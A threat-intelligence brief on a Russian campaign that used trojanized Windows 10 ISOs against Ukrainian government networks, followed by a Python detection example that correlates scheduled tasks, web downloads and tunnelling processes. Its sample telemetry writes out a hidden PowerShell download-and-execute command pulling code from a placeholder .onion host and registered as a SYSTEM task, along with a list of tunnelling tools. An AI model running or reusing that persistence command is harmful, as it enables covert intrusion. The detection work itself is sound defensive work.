Malicious Scheduled Tasks Reveal A Russian Campaign Against the Ukrainian Government
Category: Threat Actor Activity | Industry: Government | Level: Tactical | Source: Mandiant
Ukrainian government networks were compromised through trojanized ISO files masquerading as Windows 10 installers. Mandiant researchers report the discovery after identifying "several devices within Ukrainian Government networks which contained malicious scheduled tasks that communicated to a TOR website from around July 12th, 2022." The ISO files were hosted on Ukrainian- and Russian-language torrent sites. Once a victim installs Windows from the trojanized ISO, the embedded malware performs system reconnaissance to determine whether the host is of interest to the attacker; if it is, the operator can deploy additional malware. "The ISO was configured to disable the typical security telemetry a Windows computer would send to Microsoft and block automatic updates and license verification." Mandiant assesses that the threat actor's objective in the campaign is to collect and exfiltrate data from the Ukrainian government.
Neither ransomware nor cryptomining has been observed as an outcome of the campaign, which argues against a financial motive. Mandiant attributes the activity to the threat cluster UNC4166, which it links to other Russian GRU operations, including the wiper deployments associated with APT28. "The use of trojanized ISOs is novel in espionage operations and included anti-detection capabilities indicates that the actors behind this activity are security conscious and patient, as the operation would have required a significant time and resources to develop and wait for the ISO to be installed on a network of interest." Whilst not at the scale of the SolarWinds compromise, Mandiant affirms the risk posed by supply-chain attacks, stating "These operations represent a clear opportunity for operators to get to hard targets and carry out major disruptive attack which may not be contained to conflict zone."
- Malicious Scheduled Task, LOLBin & Actions on Objective
Anvilogic Use Cases:
- Create/Modify Schtasks
- Invoke-WebRequest Command
- Tunneling Process Created
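The three use cases above, chained into the scenario, as an added detection example written for this page (it is not Anvilogic's or Mandiant's own detection content). It runs over constructed JSON-lines telemetry loosely modelled on Windows Security event 4698 (scheduled task created) and Sysmon event 1 (process creation); the field names, the tunnelling-binary list, the hostnames and the .onion address are all assumptions, and the per-host correlation stands in for the scenario logic a SIEM would apply.

```python
"""Scheduled task -> web-download LOLBin -> tunnelling process detection,
run over constructed sample events (added example, not the page's own code).
Event schema and indicator lists are assumptions; tune them to your telemetry."""
import json
import re
from collections import defaultdict

# Constructed sample telemetry (not real Mandiant data). The first four lines
# describe one compromised host; the last two are benign activity on another.
SAMPLE_EVENTS = r"""
{"ts":"2022-07-12T03:14:07Z","host":"gov-ws-17","event_id":4698,"task_name":"\\Microsoft\\Windows\\UpdateHealth","task_content":"<Exec><Command>powershell.exe</Command><Arguments>-w hidden -nop -c IEX((Invoke-WebRequest http://abcdefghijklmnop.onion/s).Content)</Arguments></Exec>"}
{"ts":"2022-07-12T03:14:09Z","host":"gov-ws-17","event_id":1,"image":"C:\\Windows\\System32\\schtasks.exe","parent_image":"C:\\Windows\\System32\\cmd.exe","command_line":"schtasks /create /tn UpdateHealth /sc minute /mo 15 /ru SYSTEM /tr \"powershell -w hidden -nop -c IEX((Invoke-WebRequest http://abcdefghijklmnop.onion/s).Content)\""}
{"ts":"2022-07-12T03:29:10Z","host":"gov-ws-17","event_id":1,"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_image":"C:\\Windows\\System32\\svchost.exe","command_line":"powershell -w hidden -nop -c IEX((Invoke-WebRequest http://abcdefghijklmnop.onion/s).Content)"}
{"ts":"2022-07-12T03:30:02Z","host":"gov-ws-17","event_id":1,"image":"C:\\ProgramData\\svc\\tor.exe","parent_image":"C:\\Windows\\System32\\svchost.exe","command_line":"tor.exe -f C:\\ProgramData\\svc\\torrc"}
{"ts":"2022-07-12T08:00:00Z","host":"gov-ws-03","event_id":1,"image":"C:\\Windows\\System32\\schtasks.exe","parent_image":"C:\\Windows\\explorer.exe","command_line":"schtasks /query /tn \\Microsoft\\Windows\\Defrag\\ScheduledDefrag"}
{"ts":"2022-07-12T08:05:00Z","host":"gov-ws-03","event_id":1,"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_image":"C:\\Windows\\explorer.exe","command_line":"powershell -File C:\\Scripts\\backup.ps1"}
"""

# Assumed indicator lists.
TUNNEL_IMAGES = {"tor.exe", "plink.exe", "ngrok.exe", "chisel.exe", "frpc.exe"}
ONION_RE = re.compile(r"\b[a-z2-7]{16,56}\.onion\b", re.I)
# Invoke-WebRequest plus its Windows PowerShell 5.1 aliases (iwr, curl, wget).
WEBREQ_RE = re.compile(r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b", re.I)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|-nop\b", re.I)


def parse_events(text):
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _suspicious_action(text):
    """Enrichment reasons for a task action or schtasks command line."""
    reasons = []
    if ONION_RE.search(text):
        reasons.append("onion address")
    if WEBREQ_RE.search(text):
        reasons.append("web download cmdlet")
    if HIDDEN_RE.search(text):
        reasons.append("hidden/encoded PowerShell")
    if re.search(r"/ru\s+system\b", text, re.I):   # schtasks command line only
        reasons.append("runs as SYSTEM")
    return reasons


def detect(event):
    """Return (rule_name, reason) tuples that fire on a single event."""
    hits = []
    eid = event.get("event_id")
    if eid == 4698:
        # 4698 fires for any registration path (schtasks, Register-ScheduledTask,
        # COM), so inspect the task XML rather than a command line.
        reasons = _suspicious_action(event.get("task_content", ""))
        if reasons:
            hits.append(("create_modify_schtasks", "4698: " + ", ".join(reasons)))
    elif eid == 1:
        cmd = event.get("command_line", "")
        image = basename(event.get("image", ""))
        if image == "schtasks.exe" and re.search(r"/(create|change)\b", cmd, re.I):
            reasons = _suspicious_action(cmd) or ["task created/changed from command line"]
            hits.append(("create_modify_schtasks", "schtasks: " + ", ".join(reasons)))
        if WEBREQ_RE.search(cmd):
            hits.append(("invoke_webrequest_command", f"web download via {image}"))
        if image in TUNNEL_IMAGES:
            parent = basename(event.get("parent_image", ""))
            hits.append(("tunneling_process_created", f"{image} spawned by {parent}"))
    return hits


def correlate(events, required=("create_modify_schtasks",
                                "invoke_webrequest_command",
                                "tunneling_process_created")):
    """Group per-event hits by host; return hosts where every required rule fired."""
    by_host = defaultdict(lambda: defaultdict(list))
    for ev in events:
        for rule, reason in detect(ev):
            by_host[ev["host"]][rule].append((ev["ts"], reason))
    return {h: dict(r) for h, r in by_host.items() if set(required) <= set(r)}


if __name__ == "__main__":
    for host, rules in correlate(parse_events(SAMPLE_EVENTS)).items():
        print(host)
        for rule, hits in rules.items():
            for ts, reason in hits:
                print(f"  {ts} {rule}: {reason}")
```

Two practical caveats. Security event 4698 is only written when the "Audit Other Object Access Events" subcategory is enabled; without it, the Microsoft-Windows-TaskScheduler/Operational log (event 106, task registered) is the fallback, and a process-creation rule on schtasks.exe alone misses tasks registered through the API. The individual rules are deliberately low-fidelity (a `schtasks /create` on its own is routine); the per-host correlation is what turns them into a scenario, and a production version would additionally bound the hits to a time window.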